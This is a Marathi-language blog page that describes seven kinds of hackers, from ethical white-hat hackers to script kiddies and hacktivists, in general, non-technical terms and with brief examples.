मुख्य लेख वाचा.


Read more

ब्लॅक-हॅट हॅकर

0 comments


 अत्यंत क्रूर आणि कपटि हॅकर्स म्हणजे "ब्लॅक हॅट हॅकर्स",परवानगी शिवाय कुणाच्याही कॉम्पुटर मध्ये शिरून त्याचा डेटा आणि इतर माहितींमध्ये फेरबदल करणे हे ह्या हॅकर्स चे मुख्य हेतु असतात. ब्लॅक हॅट हॅकर्स चे बरेच ग्रुप्स पण असतात. काहि वर्षापूर्वी पाकिस्तानी हॅकर्स ग्रुप्सनी भारतातील तब्बल 270 वेबसाईट्स हॅक केल्या होत्या.



मुख्य लेख वाचा.


Read more

व्हाईट-हॅट हॅकर

0 comments






ह्या हॅकर्सना कॉम्पुटर सिक्युरिटीच संपुर्ण ज्ञान असत. हे हॅकर्स कंपनी मधील कर्मचार्याचा डेटा सुरक्षित ठेवतात.ह्या हॅकर्सना इथिकल(नैतिक) हॅकर्स किंवा एन्टी-हॅकर्स असेही म्हणतात. हे इथिकल हॅकर्स सुरक्षतेची एक भिंत तयार करतात जेणेकरून कुठलेही ब्लॅक हॅट आणि ग्रे हॅट हॅकर्स कंपनीच्या सर्व्हरमध्ये लुडबुड करत नाहित.
 आज ज्यांना हॅकिंग मध्ये Interest आहे ते Ethical Hacking हे प्रोफेशन निवडून स्वतःच करिअर घडवू शकतात.

मुख्य लेख वाचा.

Read this article in English.


Read more

हॅकर्सचे वेगवेगळे प्रकार

0 comments

  नेटवर्क व इंटरनेटच्या माध्यमातून कोणाच्याही कॉम्पुटरची सिक्यूरेटि तोडून त्याचा डेटा हाताळने,चोरने व त्याच्यात बदल करणे म्हणजे हॅकिंग.
  हॅकर्स चे वेगवेगळे प्रकार पडतात त्यातलेच काहि महत्वाचे प्रकार पुढिलप्रमाणे:

1.व्हाईट-हॅट हॅकर
2.ब्लॅक-हॅट हॅकर
3.ग्रे-हॅट हॅकर
4.ब्लू-हॅट हॅकर
5.इलाईट हॅकर
6.स्क्रिप्ट किड़ी
7.हॅक्टिवीस्ट



1.व्हाईट-हॅट हॅकर






ह्या हॅकर्सना कॉम्पुटर सिक्युरिटीच संपुर्ण ज्ञान असत. हे हॅकर्स कंपनी मधील कर्मचार्याचा डेटा सुरक्षित ठेवतात.ह्या हॅकर्सना इथिकल(नैतिक) हॅकर्स किंवा एन्टी-हॅकर्स असेही म्हणतात. हे इथिकल हॅकर्स सुरक्षतेची एक भिंत तयार करतात जेणेकरून कुठलेही ब्लॅक हॅट आणि ग्रे हॅट हॅकर्स कंपनीच्या सर्व्हरमध्ये लुडबुड करत नाहित.
 आज ज्यांना हॅकिंग मध्ये Interest आहे ते Ethical Hacking हे प्रोफेशन निवडून स्वतःच करिअर घडवू शकतात.


2.ब्लॅक-हॅट हॅकर

 अत्यंत क्रूर आणि कपटि हॅकर्स म्हणजे "ब्लॅक हॅट हॅकर्स",परवानगी शिवाय कुणाच्याही कॉम्पुटर मध्ये शिरून त्याचा डेटा आणि इतर माहितींमध्ये फेरबदल करणे हे ह्या हॅकर्स चे मुख्य हेतु असतात. ब्लॅक हॅट हॅकर्स चे बरेच ग्रुप्स पण असतात. काहि वर्षापूर्वी पाकिस्तानी हॅकर्स ग्रुप्सनी भारतातील तब्बल 270 वेबसाईट्स हॅक केल्या होत्या.


3.ग्रे-हॅट हॅकर






ग्रे हॅट हॅकर्स मध्ये "ब्लॅक हॅट हॅकर्स" आणि "व्हाईट हॅट हॅकर्स" हे दोन्ही प्रकाचे हॅकर्स असतात. ह्या हॅकर्संचा कोणालाही नुकसान करण्याचा हेतू नसतो. हे हॅकर्स सतत इंटरनेट वर सर्फिंग करत असतात आणि कोणत्याही वेबसाईटला भेटून त्याची सिक्यूरेटी मजबुत आहे का नाही ते पहातात.
उदा. जर कोणी "ग्रे हॅट हॅकर्स" इंटरनेट वर फिरत असेल आणि कोणत्यातरी एका वेबसाईटला त्याने भेट दिली आणि जर त्या वेबसाईटची सुरक्षितता कमकुवत असेल तर प्रथम हे हॅकर्स ती वेबसाईट हॅक करतात आणि त्याच्या वेबसाईटवर "तुमच्या वेबसाईटची सुरक्षितता अशक्त आहे. जर तुम्हाला ती वाढवायची असेल तर आम्हाला कॉल करा. आम्ही कमी रुपयांत तुम्हाला तुमच्या वेबसाईटची सिक्युरिटी देउ." असा मेसेज देतात.

4.ब्लू-हॅट हॅकर


   मायक्रोसॉफ्ट कंपनीमध्ये काम करणारे हॅकर्स हे ब्ल्यू हॅट हॅकर या नावाने ओळखले जातात. हे हॅकर्स कंपनी मध्ये तयार होणार्य प्रोडक्टची टेस्टिंग करतात. उदाहरण द्यायच झाल तर अस कि, जर मायक्रोसॉफ्ट नवीन ऑपरेटिंग सिस्टम लॉन्च करत असेल तर लॉन्चिंच्या आधी त्या ऑपरेटिंग सिस्टमला कोणी हॅक करू शकत का हे पाहिल जात.
 ब्ल्यू हॅट हॅकर हे ब्लॅक-हॅट हॅकर प्रमाणे विचार करून विंडोज ऑपरेटिंग सिस्टम हॅक करण्याच प्रयत्न करतात. जर सिस्टम हॅक झाली तर ते डेव्हलपर्सना रिपोर्ट देउन त्यात सुधार करण्यास सांगतात. सोप्या भाषेत सांगायच झाल तर ब्ल्यू हॅट हॅकर हे सिस्टम टेस्टिंगच काम करतात.

5.इलाईट हॅकर




अत्यंत हुषार असणारे हॅकर्स हे या प्रकारात मोडतात. हे हॅकर्स हॅकिंगचे नवीन-नवीन टेक्नॉलॉजी तयार करतात. या हॅकर्सनां प्रोग्रॅमिग स्क्रिप्टच संपुर्ण ज्ञान असत. हे हॅकर्स हॅकिंगचे वेगवेगळे सॉफ्टवेअर तयार करतात. कुठल्याही सर्व्हरची नेटवर्क सिक्यूरेटि तोडण्यात हे सक्षम असतात. यांना हॅकिंगचे इनव्हेंटर(Inventor-शोधकर्ते) म्हणल्यास वावग ठरणार नाही.

6.स्क्रिप्ट किड़ी



कमी ज्ञान असणारे हे हॅकर्स असतात. दूसर्या हॅकर्संनी तयार केलेल्या ऑटोमॅटिक हॅकिंग सॉफ्टवेअरचा वापर करून हे वेबसाईट हॅक करू शकतात. इथे स्क्रिप्ट(Script)चा अर्थ छोट्या-छोट्या हॅकिंगच्या स्क्रिप्टच ज्ञान आणि किड़ी(Kiddie)म्हणजे बाळ. सोशल मिडिया (फेसबुक,जि-मेल,याहु,लिंन्क्ड इन) मध्ये बर्याच जणांचे अकाउंट हे या हॅकर्स कडुन हॅक केले जातात.

7.हॅक्टिवीस्ट




हे हॅकर्स टेक्नॉलॉजीचा वापर करून सोशल वेबसाईट वर बदणामीचे लेख लिहतात. राजकारण,धर्म व कुठल्याही विषयाला वादग्रस्थ करणे यांचा मुख्य हेतू असतो.

उदागरण: १.फेसबुकवर मुलींना फसवने,त्याचा फेसबूक वॉलवर बदनामीचे लेख लिहणे.
       २.कोणत्याही धर्माच अनादर करणारा लेख प्रसिध्द करणे.
       ३.राजकारण्यांबद्दलचे अपमानकारक फोटो,लेख अपलोड करणे.

काहि वेळा हे हॅकर्स स्वतःचा आय पी एड्रेस(IP Address) लपवून ठेवतात,ज्यानेकरून सायबर पोलिस त्यांना शोधू शकत नाहित.



                                        "हा लेख इग्लिश मध्ये वाचा"



Read more